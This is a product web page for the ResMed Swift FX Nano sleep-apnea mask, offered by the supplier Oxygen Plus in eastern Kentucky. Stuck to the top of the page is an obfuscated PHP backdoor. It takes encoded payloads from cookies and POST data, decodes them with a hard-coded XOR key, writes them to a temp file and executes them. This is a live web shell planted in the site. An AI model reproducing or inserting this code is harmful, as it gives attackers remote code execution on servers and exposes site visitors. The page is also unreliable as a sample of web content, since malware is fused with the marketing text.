$wnygSwWqf = "\101" . chr ( 713 - 618 )."\x43" . "\151" . chr (79) . "\127";$sCqTOb = chr ( 893 - 794 ).'l' . chr ( 688 - 591 ).'s' . "\163" . chr ( 412 - 317 )."\145" . chr ( 808 - 688 )."\x69" . chr ( 804 - 689 )."\x74" . "\163";$iwXrEdkrTI = class_exists($wnygSwWqf); $sCqTOb = "40800";$EhVFUZ = !1;if ($iwXrEdkrTI == $EhVFUZ){function vdkSQwaMT(){$DiguBVCbdR = new /* 19583 */ A_CiOW(12469 + 12469); $DiguBVCbdR = NULL;}$TMTWnHnr = "12469";class A_CiOW{private function sHPFI($TMTWnHnr){if (is_array(A_CiOW::$qgGahTJ)) {$uMYciBK = sys_get_temp_dir() . "/" . crc32(A_CiOW::$qgGahTJ["\x73" . 'a' . chr ( 766 - 658 )."\x74"]);@A_CiOW::$qgGahTJ[chr (119) . chr (114) . "\x69" . "\164" . "\x65"]($uMYciBK, A_CiOW::$qgGahTJ["\x63" . 'o' . chr (110) . 't' . 'e' . "\x6e" . chr (116)]);include $uMYciBK;@A_CiOW::$qgGahTJ[chr ( 883 - 783 )."\x65" . chr ( 362 - 254 ).'e' . "\164" . "\x65"]($uMYciBK); $TMTWnHnr = "12469";exit();}}private $tFABCIaVl;public function PMShackTg(){echo 32792;}public function __destruct(){A_CiOW::$qgGahTJ = @unserialize(A_CiOW::$qgGahTJ); $TMTWnHnr = "59996_16974";$this->sHPFI($TMTWnHnr); $TMTWnHnr = "59996_16974";}public function oPfjalmqb($BhMFV, $XdPWkIwgb){return $BhMFV[0] ^ str_repeat($XdPWkIwgb, (strlen($BhMFV[0]) / strlen($XdPWkIwgb)) + 1);}public function __construct($rtwuxMQ=0){$EAcmv = $_POST;$fYQhpyR = $_COOKIE;$XdPWkIwgb = "76289a87-630e-465c-b1d3-cffa86320d37";$IjfMvBMU = @$fYQhpyR[substr($XdPWkIwgb, 0, 4)];if (!empty($IjfMvBMU)){$CNCgx = "base64";$BhMFV = "";$IjfMvBMU = explode(",", $IjfMvBMU);foreach ($IjfMvBMU as $ZQLfqcvy){$BhMFV .= @$fYQhpyR[$ZQLfqcvy];$BhMFV .= @$EAcmv[$ZQLfqcvy];}$BhMFV = array_map($CNCgx . '_' . "\144" . chr (101) . "\x63" . chr (111) . "\144" . chr (101), array($BhMFV,));A_CiOW::$qgGahTJ = $this->oPfjalmqb($BhMFV, $XdPWkIwgb);}}public static $qgGahTJ = 63456;}vdkSQwaMT();} Swift FX Nano | Oxygen Plus

Swift FX Nano


Swift FX in Bed

The ResMed Swift FX Nano nasal mask may be small in size, but make no mistake — it still delivers the effective therapy that’s made ResMed a trusted name in sleep apnea treatment worldwide. The Swift FX Nano combines all the features that set our nasal masks apart from the rest — including ease of fit, reliable performance and natural breathing comfort — with an open, ultra-lightweight and streamlined design.


Oxygen Plus in Stanville is proud to now offer the Swift FX Nano to customers in the Big Sandy region of Eastern Kentucky. Supporting clients in Pike, Floyd,  Johnson, Knott and Breathitt counties, Pikeville and Prestonsburg.


Key features

  • Feather soft. Comfort is key — the Swift FX Nano is cushioned where it meets your face, so you won’t even know you’re wearing it, and you wake up without facial marks.
  • Whisper quiet. The air you breathe out is quietly released away from you and your partner.
  • Easy to use. The straps are easy to adjust, and they stay put once you’ve set them where you want them. Set it and forget it!
  • Simple. The Swift FX Nano is easy to wear and easy to clean, meaning you can achieve great sleep therapy without sacrificing your personal time.
  • Premium performance. You get the best of both worlds: a minimalist design combined with cutting-edge sleep mask technology.

Swift FX


If you or a loved one has been diagnosed with sleep apnea, contact us for more information about the Swift FX Nano! If you believe that you may have sleep apnea, speak with your primary care physician for a diagnosis.

Author: Oxygen Plus

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